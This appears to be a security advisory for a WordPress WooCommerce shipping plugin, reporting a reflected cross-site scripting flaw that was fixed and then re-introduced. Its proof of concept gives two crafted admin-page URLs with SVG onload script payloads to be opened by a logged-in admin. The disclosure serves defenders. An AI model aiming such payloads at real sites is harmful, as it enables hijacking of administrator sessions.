Description The plugin does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Note: The issue was fixed in 1.14.15 but re-introduced in 1.14.16
Make a logged in admin open one of the URL below:
http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&data[name]='><svg/onload=alert(/XSS/)>
http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&errors[name][][text]=<svg/onload=alert(/XSS/)>